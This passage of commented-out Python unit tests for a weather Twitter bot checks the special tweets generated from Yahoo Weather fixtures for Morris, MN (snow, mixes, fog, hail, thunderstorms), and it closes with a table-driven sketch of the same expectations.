# ydata6 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! 
# Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '8', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '43', 'text': 'Heavy Snow'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-33', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data6 = weatherBot.get_weather_variables(ydata6)
# self.assertEqual(weatherBot.make_special_tweet(weather_data6), 'Heavy snow. Bundle up.')
#
# def test_make_special_tweet_mixes(self):
# """Testing if mixes event is triggered"""
# ydata1 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! 
# Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '5', 'text': 'Mixed Rain and Snow'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data1 = weatherBot.get_weather_variables(ydata1)
# self.assertEqual(weatherBot.make_special_tweet(weather_data1),
# 'What a mix! Currently, there\'s mixed rain and snow falling from the sky.')
# ydata2 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! 
# Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '8', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '6', 'text': 'Mixed Rain and Sleet'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-33', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data2 = weatherBot.get_weather_variables(ydata2)
# self.assertEqual(weatherBot.make_special_tweet(weather_data2),
# 'What a mix! Currently, there\'s mixed rain and sleet falling from the sky.')
# ydata3 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! 
# Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '7', 'text': 'Mixed Snow and Sleet'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data3 = weatherBot.get_weather_variables(ydata3)
# self.assertEqual(weatherBot.make_special_tweet(weather_data3),
# 'What a mix! Currently, there\'s mixed snow and sleet falling from the sky.')
#
# def test_make_special_tweet_fog(self):
# """Testing if fog event is triggered"""
# ydata = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '4', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! 
# Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '20', 'text': 'Fog'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '37', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data1 = weatherBot.get_weather_variables(ydata)
# self.assertEqual(weatherBot.make_special_tweet(weather_data1), 'Do you even fog bro?')
#
# def test_make_special_tweet_hail(self):
# """Testing if hail event is triggered"""
# ydata1 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! 
# Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '17', 'text': 'Hail'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data1 = weatherBot.get_weather_variables(ydata1)
# self.assertEqual(weatherBot.make_special_tweet(weather_data1), 'IT\'S HAILIN\'!')
# ydata2 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! 
# Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '8', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '35', 'text': 'Mixed Rain and Hail'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-33', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data2 = weatherBot.get_weather_variables(ydata2)
# self.assertEqual(weatherBot.make_special_tweet(weather_data2), 'IT\'S HAILIN\'!')
#
# def test_make_special_tweet_thunderstorms(self):
# """Testing if thunderstorm event is triggered"""
# ydata = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '4', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! 
# Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '4', 'text': 'Thunderstorms'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '37', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data = weatherBot.get_weather_variables(ydata)
# self.assertEqual(weatherBot.make_special_tweet(weather_data), 'Meh, just a thunderstorm.')
#
# def test_make_special_tweet_severe_thunderstorms(self):
# """Testing if severe thunderstorm event is triggered"""
# ydata = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '4', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! 
# Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '3', 'text': 'Severe Thunderstorms'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '37', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data = weatherBot.get_weather_variables(ydata)
# self.assertEqual(weatherBot.make_special_tweet(weather_data),
# 'IT BE STORMIN\'! Severe thunderstorms right now.')
#
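Every special-tweet case above follows one pattern: fix a condition code, call `weatherBot.make_special_tweet`, and compare against a fixed string. If these tests are revived, a table-driven loop would collapse them. The sketch below is hedged: `special_tweet_for` is a hypothetical stand-in that only restates the expected strings recorded in these comments (the real mapping lives in `weatherBot.make_special_tweet`), and the code-to-text pairs come straight from the fixtures above.

```python
def special_tweet_for(code, text):
    """Hypothetical mirror of the expectations in the commented-out tests above."""
    if code in ('0', '1'):  # tornado, tropical storm
        return "HOLY SHIT, THERE'S A %s!" % text.upper()
    if code == '3':
        return "IT BE STORMIN'! Severe thunderstorms right now."
    if code == '4':
        return 'Meh, just a thunderstorm.'
    if code in ('5', '6', '7'):  # wintry mixes
        return "What a mix! Currently, there's %s falling from the sky." % text.lower()
    if code in ('15', '16', '41', '43'):  # snow variants
        return '%s. Bundle up.' % text.capitalize()
    if code in ('17', '35'):  # hail, mixed rain and hail
        return "IT'S HAILIN'!"
    if code == '20':
        return 'Do you even fog bro?'
    return None


# One (code, text, expected tweet) row per case from the comments above.
SPECIAL_CASES = [
    ('15', 'Blowing Snow', 'Blowing snow. Bundle up.'),
    ('5', 'Mixed Rain and Snow',
     "What a mix! Currently, there's mixed rain and snow falling from the sky."),
    ('20', 'Fog', 'Do you even fog bro?'),
    ('17', 'Hail', "IT'S HAILIN'!"),
    ('4', 'Thunderstorms', 'Meh, just a thunderstorm.'),
    ('3', 'Severe Thunderstorms', "IT BE STORMIN'! Severe thunderstorms right now."),
    ('0', 'Tornado', "HOLY SHIT, THERE'S A TORNADO!"),
]

for code, text, expected in SPECIAL_CASES:
    assert special_tweet_for(code, text) == expected
```

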